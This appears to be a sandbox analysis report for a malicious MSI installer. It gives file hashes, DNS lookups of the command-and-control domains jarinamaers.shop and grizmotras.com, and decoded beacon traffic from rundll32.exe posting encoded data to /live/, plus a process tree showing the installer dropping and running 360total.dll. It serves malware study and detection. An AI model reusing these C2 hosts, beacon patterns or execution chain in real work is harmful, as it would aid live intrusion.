                                                                SHA256:8041a15e27c785f2adcce9e8c643f5cc619b52e50cd36ff043d13c4089ce1cad
                                                                SHA512:835fee905d540f1e3b4d32a0645041c9add6ea488675a8ca99dbe571cfaaef5781bed8c1277dd7942be7d672945d68a1016c2ab5cb645d539e07893d69672adc
                                                                SSDEEP:49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
                                                                TLSH:CB75D0227386C537C96E01303A29D66B5579FDB74B3140CBA3C82D2E9EB45C16639FA3
                                                                File Content Preview:........................>.......................................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F..................................................................................
                                                                Icon Hash:2d2e3797b32b2b99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2024 02:48:16.643066883 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:16.643151045 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:16.643471956 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:16.655702114 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:16.655742884 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:16.919209957 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:16.919351101 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:16.979701996 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:16.979738951 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:16.979996920 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:16.983747005 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:16.985203028 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:17.028152943 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:22.859837055 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:22.859922886 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:22.859966040 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:22.859992981 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:22.860158920 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:22.860296965 CEST | 49714 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:22.860327005 CEST | 443 | 49714 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:23.915805101 CEST | 49715 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:23.915874958 CEST | 443 | 49715 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:23.915951967 CEST | 49715 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:23.916218996 CEST | 49715 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:23.916254044 CEST | 443 | 49715 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:24.173628092 CEST | 443 | 49715 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:24.173687935 CEST | 49715 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:24.174294949 CEST | 49715 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:24.174309969 CEST | 443 | 49715 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:24.176217079 CEST | 49715 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:24.176229000 CEST | 443 | 49715 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:31.195980072 CEST | 443 | 49715 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:31.196032047 CEST | 443 | 49715 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:31.196217060 CEST | 49715 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:31.196810961 CEST | 49715 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:31.196830988 CEST | 443 | 49715 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:31.325968981 CEST | 49716 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:31.326080084 CEST | 443 | 49716 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:31.326260090 CEST | 49716 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:31.326539040 CEST | 49716 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:31.326553106 CEST | 443 | 49716 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:31.587157011 CEST | 443 | 49716 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:31.587430000 CEST | 49716 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:33.129801989 CEST | 49716 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:33.129825115 CEST | 443 | 49716 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:33.132189035 CEST | 49716 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:33.132199049 CEST | 443 | 49716 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:38.234056950 CEST | 443 | 49716 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:38.234132051 CEST | 443 | 49716 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:38.235032082 CEST | 49716 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:38.235220909 CEST | 49716 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:38.235243082 CEST | 443 | 49716 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:38.325870991 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:38.325910091 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:38.326781988 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:38.327100039 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:38.327114105 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:38.587868929 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:38.591837883 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:38.593571901 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:38.593571901 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:38.593585014 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:38.593599081 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:44.735337973 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:44.735404015 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:44.735425949 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:44.735434055 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:44.735480070 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:44.735737085 CEST | 49717 | 443 | 192.168.2.5 | 104.21.46.75
Apr 26, 2024 02:48:44.735754967 CEST | 443 | 49717 | 104.21.46.75 | 192.168.2.5
Apr 26, 2024 02:48:45.091228962 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:45.091264963 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:45.091329098 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:45.091772079 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:45.091784954 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:45.367361069 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:45.367427111 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:45.402038097 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:45.402062893 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:45.402436972 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:45.402482986 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:45.402915955 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:45.448117971 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:49.462635994 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:49.462759972 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:49.462867022 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:50.923677921 CEST | 49718 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:50.923712015 CEST | 443 | 49718 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:51.189179897 CEST | 49719 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:51.189289093 CEST | 443 | 49719 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:51.189385891 CEST | 49719 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:51.189682961 CEST | 49719 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:51.189718962 CEST | 443 | 49719 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:51.449820042 CEST | 443 | 49719 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:51.449889898 CEST | 49719 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:51.450421095 CEST | 49719 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:51.450445890 CEST | 443 | 49719 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:51.452012062 CEST | 49719 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:51.452023029 CEST | 443 | 49719 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:57.895072937 CEST | 443 | 49719 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:57.895155907 CEST | 49719 | 443 | 192.168.2.5 | 172.67.219.28
Apr 26, 2024 02:48:57.895175934 CEST | 443 | 49719 | 172.67.219.28 | 192.168.2.5
Apr 26, 2024 02:48:57.895319939 CEST | 49719 | 443 | 192.168.2.5 | 172.67.219.28
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2024 02:48:16.503490925 CEST | 63888 | 53 | 192.168.2.5 | 1.1.1.1
Apr 26, 2024 02:48:16.638087034 CEST | 53 | 63888 | 1.1.1.1 | 192.168.2.5
Apr 26, 2024 02:48:44.927417040 CEST | 50162 | 53 | 192.168.2.5 | 1.1.1.1
Apr 26, 2024 02:48:45.090195894 CEST | 53 | 50162 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 26, 2024 02:48:16.503490925 CEST | 192.168.2.5 | 1.1.1.1 | 0xa1cd | Standard query (0) | jarinamaers.shop | A (IP address) | IN (0x0001) | false
Apr 26, 2024 02:48:44.927417040 CEST | 192.168.2.5 | 1.1.1.1 | 0xf7f | Standard query (0) | grizmotras.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 26, 2024 02:48:16.638087034 CEST | 1.1.1.1 | 192.168.2.5 | 0xa1cd | No error (0) | jarinamaers.shop | | 104.21.46.75 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 02:48:16.638087034 CEST | 1.1.1.1 | 192.168.2.5 | 0xa1cd | No error (0) | jarinamaers.shop | | 172.67.136.103 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 02:48:45.090195894 CEST | 1.1.1.1 | 192.168.2.5 | 0xf7f | No error (0) | grizmotras.com | | 172.67.219.28 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 02:48:45.090195894 CEST | 1.1.1.1 | 192.168.2.5 | 0xf7f | No error (0) | grizmotras.com | | 104.21.59.82 | A (IP address) | IN (0x0001) | false
                                                                • jarinamaers.shop
                                                                • grizmotras.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 104.21.46.75 | 443 | 2624 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 00:48:16 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: jarinamaers.shop
                                                                Content-Length: 252
                                                                Cache-Control: no-cache
2024-04-26 00:48:16 UTC | 252 | OUT | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uLD446zklWjQWdm7Dz/JjI0LYPHJQlw5byjZL0v8Ec2bGtj8eOHezoWuJ4TtHHM5rJSB9DWQ==
2024-04-26 00:48:22 UTC | 574 | IN | HTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vrafeva9SPCjQCSc8ntk1E4nqUnSJ2vxX77vaRy3zYhuwEEhDm7RD6YNhAvvR7bfwRooAiIkMi59SD%2BUEObRzDd0S3aY%2FIpm93qSvnE9AOrB0gEy%2F%2Fm8ORb0ol68GtxHrgew"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a290fb29885c6f-MIA
                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 00:48:22 UTC | 26 | IN | Data Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a
Data Ascii: 14QhOmMB2npTVqDJOocQ==
2024-04-26 00:48:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49715 | 104.21.46.75 | 443 | 2624 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 00:48:24 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: jarinamaers.shop
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
2024-04-26 00:48:24 UTC | 180 | OUT | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-26 00:48:31 UTC | 572 | IN | HTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFfOhAqVrZyNNbnUiD4pf0kZEM1cDgVjprdMReps%2FsFb6hdsXeVvxgH0VG7%2Fy6AJec3qyTPWHePQrkDFOmMfUO9asytMnCfSUUMryvotXBRr6vUPTzMt%2BE1nRLSm3wdvL9md"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a291287fc46dd3-MIA
                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 00:48:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49716 | 104.21.46.75 | 443 | 2624 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 00:48:33 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: jarinamaers.shop
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
2024-04-26 00:48:33 UTC | 180 | OUT | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-26 00:48:38 UTC | 574 | IN | HTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orDHPeiOMuFrt9YYHiHNvqnOLePVM3zJe2viwCgSp%2FuWJQj3IfrWIdcV6w%2BLWUHo01gtdmrdjG1sCovD7odV5bx5hvTJFS8ks1035uing%2BjroL%2BSLvSHeHEAbLLXd08tp2QX"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a2915f785409d2-MIA
                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 00:48:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49717 | 104.21.46.75 | 443 | 2624 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 00:48:38 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: jarinamaers.shop
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
2024-04-26 00:48:38 UTC | 180 | OUT | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-26 00:48:44 UTC | 576 | IN | HTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VpTBdjA5RSFhRQAUPTjOezk91ItbQKgquQPF5%2B4sEe3CHSUjUCnmEJFdDI0p6Ok7FTUm0eG%2Bop%2FiLKJbhC1a555w3FrReQc5qjHicgNNCp0X5CKC%2FCDwlo7GeW%2F84VPK0e4S"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a2918298fadad9-MIA
                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 00:48:44 UTC | 162 | IN | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: 9cQhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnA==
2024-04-26 00:48:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49718 | 172.67.219.28 | 443 | 2624 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 00:48:45 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: grizmotras.com
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
2024-04-26 00:48:45 UTC | 180 | OUT | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: YjOeEyiMk3RvE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
2024-04-26 00:48:49 UTC | 576 | IN | HTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=viGrGAVF8zdzBCJQqKbPVZsJkI4fDrIYFeZHkXgYC4o68QPWcZc3DxC2DBTlPuHpIhJh%2BSngIaxrhYpKxxJkW5BjyL6btF%2BcO2%2FcgbzdepjGKTz8tZS31zWnagligiRetQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a291aceb1c8dd0-MIA
                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 00:48:49 UTC | 118 | IN | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 00:48:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49719 | 172.67.219.28 | 443 | 2624 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 00:48:51 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: grizmotras.com
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
2024-04-26 00:48:51 UTC | 180 | OUT | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: YjOeEyiMk3RuE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
2024-04-26 00:48:57 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=79CxeEATA5%2FJlEt5nXVUpNwRz7KdDHdgOhqhlItrVmFkdgB404BzZ3UCKgovMZwqkevqHq73uQ99Curq%2FmIIyOQgxL4RHrh9rTD6uLsRR%2Bl7knsRic3kz7i7lOo%2FJZK5nA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a291d2fbbd74b6-MIA
                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 00:48:57 UTC | 118 | IN | Data Raw: (hex dump omitted; same bytes as the Data Ascii line)
                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 00:48:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0



Target ID: 0
Start time: 02:46:47
Start date: 26/04/2024
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi"
Imagebase: 0x7ff6f20d0000
File size: 69'632 bytes
MD5 hash: E5DA170027542E25EDE42FC54C929077
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 02:46:47
Start date: 26/04/2024
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\msiexec.exe /V
Imagebase: 0x7ff6f20d0000
File size: 69'632 bytes
MD5 hash: E5DA170027542E25EDE42FC54C929077
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 02:46:47
Start date: 26/04/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding E4F2088FE7B6F79163C652AEB7DCBA5B C
Imagebase: 0x850000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 02:46:48
Start date: 26/04/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding 2B25E5241F8800AB2020C808DD90D583
Imagebase: 0x850000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 02:46:49
Start date: 26/04/2024
Path: C:\Windows\Installer\MSID8B1.tmp
Wow64 process (32bit): true
Commandline: "C:\Windows\Installer\MSID8B1.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase: 0xb20000
File size: 399'328 bytes
MD5 hash: B9545ED17695A32FACE8C3408A6A3553
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
• Detection: 0%, Virustotal, Browse
Reputation: moderate
Has exited: true

                                                                Target ID:6
                                                                Start time:02:46:49
                                                                Start date:26/04/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                                                                Imagebase:0x7ff648c90000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
